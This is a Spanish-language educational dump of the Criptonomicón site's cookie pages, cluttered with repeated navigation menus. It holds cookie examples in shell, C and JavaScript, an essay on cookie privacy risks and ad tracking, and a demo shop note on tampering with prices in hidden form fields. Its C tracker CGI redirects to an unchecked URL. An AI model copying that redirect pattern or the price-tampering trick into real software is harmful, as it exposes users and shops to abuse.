por el proceso de autenticacin. Por supuesto, este proceso puede aplicarse no slo a
imgenes, sino tambin a textos, documentos PDF, sonidos, vdeos, etc.
Referencias
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Authorization Required
This server could not verify that you are authorized to access the document you requested. Either you
supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply
the credentials required.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Nombres
Localizacin
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
JavaScript
Java
ASP
CGI
Limitaciones
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Nombres
Localizacin
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
JavaScript
Java
ASP
CGI
Limitaciones
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
ASP
CGI
Limitaciones
Agujeros
Spam
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
Nombres
Localizacin
JavaScript
ASP
Java
CGI
JavaScript
Limitaciones
Cookies
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Crashes
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Consejos prcticos
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Nombres
Localizacin
JavaScript
Java
ASP
CGI
Limitaciones
Cookies
Crashes
Agujeros
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
Nombres
Localizacin
JavaScript
CGI
Java
Java
ASP
CGI
JavaScript
Limitaciones
Cookies
Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Nombres
Localizacin
JavaScript
Java
ASP
Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Spam
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Pgina protegida
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Pgina protegida
Aqu podras incluir los contenidos que deseas proteger, como
texto, imgenes o lo que sea.
Navegacin segura
Nombres
Localizacin
Control de acceso
JavaScript
CGI
Java
Java
ASP
CGI
JavaScript
Limitaciones
Cookies
Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Spam
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Remailers
Anonimato
Correo seguro
Web seguro
Pgina protegida
Consejos prcticos
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Nombres
Localizacin
JavaScript
Java
ASP
Java
CGI
JavaScript
Limitaciones
Cookies
Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Linux
Navegacin segura
Control de acceso
CGI
Nombres
Localizacin
JavaScript
Java
ASP
Java
CGI
Limitaciones
JavaScript
Cookies
Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Principal
Qu son
Riesgos
Usos
A dieta
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Ejemplos
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Recursos
Principal
Qu son
Riesgos
Usos
A dieta
Ejemplos
Recursos
</ul>
<% Next %> </li>
</ul>
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Riesgos
Usos
Ejemplos
Ejemplo en ShellScript
A dieta
Recursos
Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
#!/bin/sh
Horno Express
echo "Content-type: text/html"
echo "Set-cookie: ejemplo = shellscript; expires =
Wednesday, 30-Jul-99 12:00:00 GMT"
echo ""
echo "<html><head><title>Ejemplo de
cookie</title></head><body>Te acabo de enviar una
cookie</body></html>"
Pulsando el botn vers el resultado de ejecutar el shell script anterior:
enviar cookie1
Si pulsas el botn de leer cookie1, te dars cuenta de que esa cookie no aparece
listada, ya que nos la ha enviado otro servidor. Si miras en la ventana de direccin,
vers que el servidor que te ha enviado la pgina que est leyendo en este momento
se llama www.iec.csic.es, mientras que el servidor que te ha enviado la cookie
era caniles.tic.iec.csic.es. Si quisiramos leer esa cookie desde este
servidor, habra que aadir un par de campos a la cookie, de modo que el segundo
echo quedara as:
#!/bin/sh
echo "Content-type: text/html"
echo "Set-cookie: ejemplo = shellscript; expires =
Wednesday, 30-Jul-99 12:00:00 GMT; path = /; domain =
.iec.csic.es;"
echo ""
echo "<html><head><title>Ejemplo de
cookie</title></head><body>Te acabo de enviar una
cookie</body></html>"
Puedes ver los efectos pulsando el botn de enviar cookie2:
enviar cookie2
Ahora, pulsando el botn de leer cookie2, comprobars que s que aparece la cookie,
puesto que este servidor (www.iec.csic.es) encaja en el dominio especificado
(.iec.csic.es) y el path est puesto a /.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/cookies.txt
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void set_cookie(char *name, char *value, char *expires, char *path,
char *domain, short secure)
{
printf("Set-Cookie: %s=%s;",name,value);
if (expires != NULL)
printf(" EXPIRES=%s;",expires);
if (path != NULL)
printf(" PATH=%s;",path);
if (domain != NULL)
printf(" DOMAIN=%s;",domain);
if (secure)
printf(" SECURE");
printf("\n");
}
int main()
{
char *cookies = getenv("HTTP_COOKIE");
set_cookie( "ejemplo", "CookieCGI", "Thursday, 31-Dec-1998 12:00:00 GMT", NULL,
NULL, 0 );
printf("Content-type: text/html\n\n");
printf("<html> <head>\n");
printf("<title>Cookies</title>\n");
printf("</head>\n\n");
printf("<body>\n");
printf( "Has recibido las siguientes cookies:<P>" );
printf( "%s<P>", cookies );
printf("</body> </html>\n");
return 0;
}
Contador de visitas
En todos los guiones que hagamos, se debe copiar en primer lugar las funciones de escribir, leer y borrar cookies, as como las
variables necesarias para las fechas de caducidad, entre las etiquetas <HEAD> y </HEAD>. Si no sabes cmo generar esas
funciones, encontrars instrucciones en el Horno Express. A su vez, todas las instrucciones en JavaScript anteriores deben
aparecer entre las etiquetas apropiadas:
<SCRIPT LANGUAGE="JavaScript">
<!-- Va todo comentado por si el navegador es muy antiguo y no reconoce los guiones
JavaScript
function Contador(info){
// Cuntas veces
var cuenta = getCookie('Veces')
if ( cuenta== null) {
cuenta = 0;
}
else{
cuenta++;
}
setCookie ('Veces', cuenta, caduca);
return cuenta+1;
}
// El resto de funciones
//-->
</SCRIPT>
A continuacin, para aadir el contador de visitas, copia el siguiente cdigo donde quieres que aparezca el texto del contador:
<SCRIPT LANGUAGE="JavaScript">
<!-var visitas = Contador();
if ( visitas == 1 ) {
document.write("Hola, esta es la primera vez que visitas esta pgina.
");
}
else
document.write("Hola, has visitado esta pgina <b>" + visitas + "</b>
veces. ")
//-->
</SCRIPT>
El efecto sera el siguiente:
Si actualizas la pgina o vas a otro sitio y vuelves ms tarde, comprobars cmo el contador se va incrementando.
Tambin puedes hacer que el mensaje aparezca en una ventana, modificando la instruccin anterior:
<SCRIPT LANGUAGE="JavaScript">
<!-alert("Hola, has visitado esta pgina " + visitas + " veces.");
//-->
</SCRIPT>
Puedes comprobarlo pulsando el botn:
[Volver a pgina de ejemplos] [Siguiente ejemplo]
Bienvenida personalizada
En todos los guiones que hagamos, se debe copiar en primer lugar las funciones de escribir, leer y borrar cookies, as como
las variables necesarias para las fechas de caducidad, entre las etiquetas <HEAD> y </HEAD>. Si no sabes cmo generar
esas funciones, encontrars instrucciones en el Horno Express. A su vez, todas las instrucciones en JavaScript anteriores,
ms la que recoge tu nombre, deben aparecer entre las etiquetas apropiadas:
<SCRIPT LANGUAGE="JavaScript">
<!-- Va todo comentado por si el navegador es muy antiguo y no reconoce los guiones
JavaScript
function Bienvenido(info){
//Quin eres?
var Visitante = getCookie('Visitante')
if (Visitante == null) {
Visitante = prompt("Puedes darme tu nombre?", "Nadie");
setCookie ('Visitante ', Visitante, caduca);
}
return Visitante;
}
// El resto de funciones
//-->
</SCRIPT>
A continuacin, para aadir la bienvenida personalizada, copia el siguiente cdigo donde quieres que aparezca el texto de
bienvenida:
<SCRIPT LANGUAGE="JavaScript">
<!-document.write("Hola, <b>" + Bienvenido() + "</b>. Me alegro de verte por
aqu");
//-->
</SCRIPT>
El efecto sera el siguiente:
Si actualizas la pgina o vas a otro sitio y vuelves ms tarde, comprobars cmo recuerdo tu nombre.
Sera interesante aadir la posiblidad de cambiar el nombre, bien porque haya varias usuarios en la misma mquina, bien
porque haya sido introducido incorrectamente. La manera de hacerlo sera aadir unos botones, mediante el siguiente
cdigo:
<FORM>
<INPUT TYPE="button" VALUE="borrar nombre" onClick="deleteCookie('Visitante')">
<INPUT TYPE="button" VALUE="cambiar nombre" onClick="cambiaNombre()">
</FORM>
Para ello es necesario aadir junto a las anteriores la funcin para cambiar el nombre, que ser la siguiente:
function cambiaNombre() {
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/bienvenida.html (1 of 2) [25/10/2000 02:32:19 p.m.]
<SCRIPT LANGUAGE="JavaScript">
<!-alert("Hola, " + Bienvenido() + ". Me alegro de verte por aqu");
//-->
</SCRIPT>
Puedes comprobarlo pulsando el botn:
[Volver a pgina de ejemplos] [Siguiente ejemplo]
ltima visita
En todos los guiones que hagamos, se debe copiar en primer lugar las funciones de escribir, leer y borrar cookies, as como
las variables necesarias para las fechas de caducidad, entre las etiquetas <HEAD> y </HEAD>. Si no sabes cmo generar esas
funciones, encontrars instrucciones en el Horno Express. A su vez, todas las instrucciones en JavaScript anteriores, ms las
especficas para la ltima visita,deben aparecer entre las etiquetas apropiadas:
<SCRIPT LANGUAGE="JavaScript">
<!-- Va todo comentado por si el navegador es muy antiguo y no reconoce los guiones
JavaScript
function Cuando(info){
// Cundo me visitas
var ahora = new Date()
var tiempo = 0;
tiempo = getCookie('Cuando');
tiempo = tiempo * 1;
var ultimaVezFormateado = new Date(tiempo); // pasa de nmero a fecha
var intLastVisit = (ultimaVezFormateado.getYear() *
10000)+(ultimaVezFormateado.getMonth() * 100) + ultimaVezFormateado.getDate()
var ultimaVezEnFecha = "" + ultimaVezFormateado; // se usan funciones
substring
var diaSemana = ultimaVezEnFecha.substring(0,3)
var fechaMes = ultimaVezEnFecha.substring(4,11)
var horaDia = ultimaVezEnFecha.substring(11,16)
var anio = ultimaVezEnFecha.substring(23,25)
var texto = diaSemana + ", " + fechaMes + " a las " +horaDia // lo muestra
setCookie ("Cuando", ahora.getTime(), caduca)
return texto;
}
// El resto de funciones
//-->
</SCRIPT>
A continuacin, para aadir la informacin de ltima visita, copia el siguiente cdigo donde quieres que aparezca el texto con
la informacin:
<SCRIPT LANGUAGE="JavaScript">
<!-document.write("Hola. La ltima vez que visitaste esta pgina fue en <b>" +
Cuando() +"<b>. ")
//-->
</SCRIPT>
El efecto sera el siguiente:
Si actualizas la pgina o vas a otro sitio y vuelves ms tarde, comprobars cmo los datos de la ltima visita se van
actualizando.
Tambin puedes hacer que el mensaje aparezca en una ventana, modificando la instruccin anterior:
<SCRIPT LANGUAGE="JavaScript">
<!-alert("Hola. La ltima vez que visitaste esta pgina fue en " + Cuando() +".
")
//-->
</SCRIPT>
Puedes comprobarlo pulsando el botn:
[Volver a pgina de ejemplos] [Siguiente ejemplo]
Todos juntos
A continuacin, para aadir el contador de visitas, copia el siguiente cdigo donde quieres que aparezca el texto del contador:
<SCRIPT LANGUAGE="JavaScript">
<!-var visitas = Contador();
if ( visitas == 1 ) {
document.write("Hola, <b>" + Bienvenido() + "</b>. Esta es la primera
vez que visitas esta pgina. ");
Cuando();
}
else
document.write("Hola, <b>" + Bienvenido() + "</b>. Has visitado esta
pgina <b>" + visitas + "</b> veces. La ltima fue en <b>" + Cuando() +"</b>. ")
//-->
</SCRIPT>
El efecto sera el siguiente:
Si actualizas la pgina o vas a otro sitio y vuelves ms tarde, comprobars cmo el contador se va incrementando.
Como en los casos anteriores, tambin puedes hacer que el mensaje aparezca en una ventana, modificando la instruccin
anterior:
<SCRIPT LANGUAGE="JavaScript">
<!-alert("Hola, " + Bienvenido() + ". Has visitado esta pgina " + visitas + "
veces. La ltima fue en " + Cuando() +".");
//-->
</SCRIPT>
Puedes comprobarlo pulsando el botn:
[Volver a pgina de ejemplos] [Siguiente ejemplo]
Pgina normal
Pgina chillona
Pgina de hacker
Pgina delicada
La Tienda Virtual
La Tienda Virtual
Esta es una tienda muy sencillita, con un par de secciones y unos pocos artculos en cada seccin, pero
nos sirve para ilustrar una manera como podran funcionar los carritos de la compra.
Puedes ir de compras por las siguentes secciones:
Seccin de informtica
Seccin de deportes
[Volver a pgina de ejemplos] [Ver el carrito] [Pasar por caja] [Vaciar el carrito]
Seccin de informtica
Pantalla de ordenador 125.000 pta (Ref. 10001)
Cantidad:
Altavoces 5.000 pta (Ref. 19831)
Cantidad:
Lector de CD-ROM 15.000 pta (Ref. 12000)
Cantidad:
Pedir
Ntese que se utilizan campos ocultos para pasar al servidor la informacin sobre
el precio de los artculos. Si esta informacin no fuera contrastada, se le podra
engaar modificando el valor de las etiquetas con un precio menor. Puedo
comprobarlo editando el cdigo fuente de esta pgina.
[Volver a la tienda] [Ver el carrito] [Pasar por caja] [Vaciar el carrito]
Seccin de deportes
Pies de gato 12.000 pta (Ref. 19801)
Cantidad:
Cuerda dinmica 22.500 pta (Ref. 21003)
Cantidad:
Arns 10.200 pta (Ref. 82078)
Cantidad:
Pedir
Ntese que se utilizan campos ocultos para pasar al servidor la informacin sobre
el precio de los artculos. Si esta informacin no fuera contrastada, se le podra
engaar modificando el valor de las etiquetas con un precio menor. Puedo
comprobarlo editando el cdigo fuente de esta pgina.
[Volver a la tienda] [Ver el carrito] [Pasar por caja] [Vaciar el carrito]
Nota: si quieres ver cmo funciona la mejor tienda virtual del ciberespacio en artculos de montaa, psate por Barrabs.
Ya slo nos faltara escribir un sencillo programa que examine los contenidos del fichero de registro,
para calcular estadsiticas como nmero de visitas a una pgina, procedencia ms comn de los
visitantes, quin es el visitante ms asiduo (se le podra dar un premio), etc.
Nota - Si examina varias veces el registro, no olvide pulsar el botn de recargar la pgina.
Principal
Qu son
Riesgos
Usos
A dieta
Ejemplos
Recursos
Refresco de banners
Si te fijas en el cartelito o banner de ah arriba, pondr BANNER 0 si es la primera
vez que visitas esta pgina. En caso contrario, aprecer un nmero, hasta 4, ya que a
partir de ah se retorna cclicamente al 0. En otras palabras, lo que estoy haciendo es
enviarte una cookie en la que especifico qu banner se te mostrar, evitando repetirte
siempre el mismo banner, una y otra vez (banner burnout).
Este es un truco comnmente utilizado por los publicistas para evitar que veas
demasiadas veces el mismo anuncio. Por supuesto, se podra refinar, mostrando un
banner u otro en funcin de tus preferencias, controlar cuntas veces se muestra sin
que hagas click en l, etc.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Ejemplos
Usos de las cookies
A dieta
Recursos
Bien vistos
Mal vistos
Alternativas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Ejemplos
Usos de las cookies
A dieta
Recursos
Bien vistos
Mal vistos
Alternativas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Ejemplos
Usos de las cookies
A dieta
Recursos
Bien vistos
Mal vistos
Alternativas
Como queda dicho, la razn de ser de las cookies es almacenar el estado de la sesin
entre peticiones sucesivas, puesto que el protocolo HTTP es sin estado. No obstante,
existen por lo menos otros dos mtodos que ya eran usados mucho antes de que
aparecieran las cookies, a saber, transmitir datos del estado de la sesin a travs de
campos ocultos en los formularios CGI y aadir datos del estado al final de un URL.
Como ejemplo del ltimo enfoque, considrese el siguiente URL:
/cgi-bin/tracker.exe?curso.html
donde tracker.exe es un programa que filtra todas las direcciones y almacena en
un fichero el nombre y direccin IP de la mquina que solicita la pgina, la hora de la
peticin, y la pgina solicitada. La direccin despus del interrogante es la de la
pgina que se quiere visitar. De esta manera y sin necesidad de cookies podemos
hacer un seguimiento exhaustivo del nmero y la identidad de las visitas a una
pgina. Puedes ver mi ejemplo de programa de seguimiento en CGI.
Por otro lado, para usar los formularios con campos ocultos es necesario procesar
todas las pginas mediante "form submit", un mtodo que hoy en da ya queda muy
obsoleto, aunque puede seguir usndose en algunas aplicaciones, como en carritos de
compra, adems de consumir un gran ancho de banda por su voluminosidad.
Las cookies mejoran los mtodos anteriores en trminos de facilidad de uso,
rendimiento, flexibilidad y seguridad.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/tracker.txt
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define REMOTE_HOST getenv("REMOTE_HOST")
#define QUERY_STRING getenv("QUERY_STRING")
char x2c(char *what)
{
register char digit;
digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
digit *= 16;
digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
return(digit);
}
void unescape_url(char *url)
{
register int x,y;
for (x=0,y=0; url[y]; ++x,++y) {
if((url[x] = url[y]) == '%') {
url[x] = x2c(&url[y+1]);
y+=2;
}
}
url[x] = '\0';
}
int main( )
{
char * sHitsFile = "visitas.txt";
FILE * fHits;
time_t ltime;
char * sURL = (char *)QUERY_STRING;
unescape_url( sURL );
if ( ( fHits = fopen( sHitsFile, "a+" ) ) == NULL ) {
fprintf(stderr,"Error -- No se ha podido abrir el fichero de hits");
return 1;
}
time( <ime );
fprintf( fHits, "%s\n%s%s\n\n", REMOTE_HOST, ctime( <ime ), sURL );
fclose( fHits );
printf( "Location: %s\n\n", sURL );
return 0;
}
Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios
Riesgos imaginarios
Lo que las cookies no pueden hacer
Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
A pesar de que circulan muchos bulos sobre falsos virus por
amenaza?
Internet, una creencia muy extendida entre los usuarios inexpertos
La Gran Cookie nos
es que las cookies nos pueden contagiar un virus (bueno, a
vigila
nosotros no, al ordenador). Para ello, es requisito indispensable que
Histeria colectiva
la cookie contenga cdigo ejecutable, por un lado, y adems que
luego se le mande ejecutar. En primer lugar, hasta la fecha no se conoce una cookie
ejecutable; en segundo lugar, aunque la hubiera, adems debera existir una aplicacin
que la invocase para que el cdigo destructivo se ejecutara, lo cual exigira una ardua
labor de programacin. As que en vez de preocuparse por imaginarios virus
transmitidos por las cookies, es mejor estar atento a los agujeros de seguridad
tangibles y reales de los navegadores, a los fallos de seguridad de Java, JavaScript,
ActiveX, CGI, y dems componentes de la Familia Dinmica de la Web.
Otro bulo muy extendido es que una cookie nos desnuda, desvelando nuestra
intimidad. Una cookie de HTTP tampoco puede ser usada para extraer datos de tu
disco duro, conseguir tu direccin de correo electrnico o robar informacin sensible
acerca de tu persona. Para ello existen otras formas mucho ms prometedoras y que
ya funcionan bien sin necesidad de cookies. En definitiva, una cookie no almacena
ms informacin confidencial que la que le queramos dar al servidor que nos la enva.
Ms bulos. Tambin se dice que el servidor consigue acceso a nuestro disco duro
gracias a las cookies. No es exacto. No hay que perder de vista que en el caso de las
cookies no es el servidor el que lee o escribe en nuestro disco duro, sino el navegador,
de la misma forma que lee o escribe en nuestro cache de disco (y nadie se rasga las
vestiduras por ello, y eso que el Explorer tuvo un serio agujero de seguridad por su
causa). El servidor pide al navegador que lea o escriba las cookies, pero, en ningn
caso, tiene a travs de ellas acceso directo a nuestro disco duro.
A pesar de todo, si aparentemente son tan inofensivas, entonces, de dnde procede
todo el revuelo acerca de las cookies?
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/imaginarios.html (1 of 2) [25/10/2000 02:32:22 p.m.]
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios
Riesgos reales
Lo que las cookies s pueden hacer
Las cookies son simplemente texto, que se puede editar
perfectamente con cualquier editor ASCII, y como tales, son
elementos pasivos que no pueden emprender ninguna accin. Slo
pueden ser ledos o escritos, pero no pueden ejecutarse ni mandar
ejecutar ningn programa, por lo tanto no representan ninguna
amenaza para tu ordenador ni pueden infectarlo con ningn virus.
Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
amenaza?
La Gran Cookie nos
vigila
Histeria colectiva
Es importante comprender que por diseo las cookies poseen las siguientes
limitaciones:
Trescientas cookies en total en el archivo de cookies. Si llega la nmero 301, se
borra la ms antigua.
4 Kbytes por cookie, para la suma del nombre y valor de la cookie.
Veinte cookies por servidor o dominio (los hosts y dominios completamente
especificados se tratan como entidades separadas y tienen una limitacin de 20
cookies cada uno, no juntos).
Ninguna mquina que no encaje en el dominio de la cookie puede leerla. Es
decir, la informacin almacenada en una cookie no puede ser leda por una
mquina distinta de la que la envi.
An as, las cookies no son un buen elemento de seguridad, ya que cualquiera que
conozca mnimamente su funcionamiento podra acceder fsicamente o tal vez a
travs de red local, pero no a travs de Internet, a los datos guardados en las cookies
dentro de un ordenador y utilizar todos los servicios a los que permiten acceder los
nombres y contraseas en ellas almacenados.
Por otro lado, s que es cierto que lo que inicialmente se cre como un mecanismo
para beneficiar al usuario ha sido pervertido para beneficiar al anunciante, que
husmea nuestras idas y venidas y almacena perfiles de usuario para luego dirigirnos
su propaganda personalizada. Esta posibilidad abre las puertas a especulaciones
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/reales.html (1 of 2) [25/10/2000 02:32:23 p.m.]
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios
Riesgos reales
Buenas intenciones
Marketing
Cuando se crearon, las cookies tenan como objetivo favorecer al
personalizado
usuario. Al permitir que los sitios Web recordasen a los
Gran herramienta o
visitantes, se les poda ofrecer un servicio individualizado,
amenaza?
avisarles de novedades y liberarles de ciertas tareas engorrosas de
La Gran Cookie nos
identificacin. Algo parecido a entrar en un restaurante y que el
vigila
camarero nos llame por nuestro nombre, nos siente en nuestra mesa Histeria colectiva
favorita, nos sirva nuestro vino preferido y nos sugiera el nuevo
men que segn nuestros gustos seguramente nos agradar. Sin embargo, esa
capacidad de recordar constituye el instrumento del que se sirven para rastrearnos. De
ah surge la preocupacin por la intimidad y el potencial para violarla de las cookies.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Marketing personalizado
A quin no le ha sucedido recibir una cookie de, por ejemplo,
Doubleclick, mientras visitaba un sitio que aparentemente nada
tena que ver con esa compaa? Que t sepas, nunca has visitado
sus pginas ni has mantenido relacin con ellos. El navegador te ha
avisado de que vas a recibir una cookie de Doubleclick, pero no
sabes muy bien por qu, si en realidad no ests visitando su sitio ni
lo has hecho anteriormente.
Reverso tenebroso
Riesgos imaginarios
Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
amenaza?
La Gran Cookie nos
vigila
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios
Riesgos reales
Buenas intenciones
Marketing
personalizado
Gran herramienta o
amenaza?
La Gran Cookie nos
vigila
Histeria colectiva
Por lo tanto, la peticin del banner nos cuela primero una cookie y luego nos enva la
imagen publicitaria. En estas circunstancias, la cookie, junto con la peticin de la
imagen, podra posteriormente registrar qu anuncios haban sido presentados
previamente al usuario y qu banners se haban pinchado. Si a continuacin el cliente
navegara hacia otro sitio que obtuviera sus anuncios del mismo servidor anterior,
cuando esa pgina pidiera el banner al servidor de terceras partes, entonces el servidor
leera la misma cookie, lo que le permitira mostrar anuncios a medida, a partir de la
informacin almacenada en la cookie, de manera que el usuario no volvera a ver el
mismo anuncio. Adicionalmente, se establecera otra variable en la cookie indicando
que ya ha visitado ese sitio, de modo que una vez reunida toda esta informacin, se
podra disear fcilmente un perfil de usuario con sus gustos, antipatas y lugares que
visita, con el fin de dirigirle publicidad cada vez ms precisa y personalizada. Resulta
